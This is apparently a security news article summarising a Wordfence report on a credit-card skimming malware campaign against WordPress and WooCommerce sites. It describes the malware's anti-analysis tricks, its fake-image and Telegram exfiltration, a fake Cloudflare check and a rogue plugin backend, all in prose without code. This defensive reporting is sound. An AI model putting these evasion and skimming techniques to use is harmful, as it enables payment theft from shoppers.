Advanced Malware Campaign Targets WordPress and WooCommerce Sites with Hidden Skimmers

The Wordfence Threat Intelligence Team uncovered a sophisticated malware campaign during a routine site cleanup, revealing a family of malicious code targeting WordPress and WooCommerce platforms.

This campaign, which dates back to September 2023 as per their Threat Intelligence platform, showcases a dynamic and evolving framework with over 20 distinct samples.

Sophisticated Malware Framework

The malware variants primarily focus on credit card skimming and credential theft but also feature diverse functionalities such as malicious ad manipulation and further payload distribution.

What sets this operation apart is a novel approach: some variants embed a live backend system directly on infected websites, disguised as rogue WordPress plugins, providing attackers with a custom interface to manage stolen data and manipulate site operations.

This malware family employs advanced obfuscation techniques and anti-analysis mechanisms to evade detection, including developer tools detection, console rebinding, and debugger traps that can freeze browser tabs or halt debugging processes.

By monitoring differences between window dimensions (outerWidth/innerWidth), the malware identifies if developer tools are active and alters its behavior accordingly.

Technical Intricacies

It further disables browser shortcuts like F12 and Ctrl+Shift+I, while some variants use infinite loops to obstruct reverse engineering.

Targeting is highly selective, focusing on checkout pages and avoiding admin panels through cookie-based checks, ensuring minimal visibility to site administrators.

Data exfiltration is equally cunning, with stolen payment and billing information encoded in Base64, appended with custom schemes, and transmitted via fake image URLs to attacker-controlled servers.

Beyond skimming, certain samples manipulate Google Ads for fraud, steal WordPress login credentials, or replace legitimate links with malicious ones, demonstrating the framework’s versatility.

A standout feature is a fake human verification challenge mimicking Cloudflare branding, complete with multi-language support, animations, and dark mode CSS, designed to deceive users and filter bots.

Additionally, some variants integrate Telegram channels for real-time data exfiltration and employ localStorage for persistence across sessions.

The use of a rogue WordPress plugin, misleadingly named “WordPress Core,” marks a significant escalation, embedding server-side PHP scripts to manage stolen data via custom post types and manipulate order statuses to “completed” to delay fraud detection.

This campaign’s complexity, with its evolving codebase and AI-generated plugin scaffolding, underscores a persistent threat to the web ecosystem.

Wordfence has responded by releasing detection signatures between May 17 and June 15, 2025, available immediately to Premium, Care, and Response customers, with a 30-day delay for free users.

Their CLI scanner and plugin detect over 99% of known samples, reinforcing a defense-in-depth approach.

Indicators of Compromise (IoCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates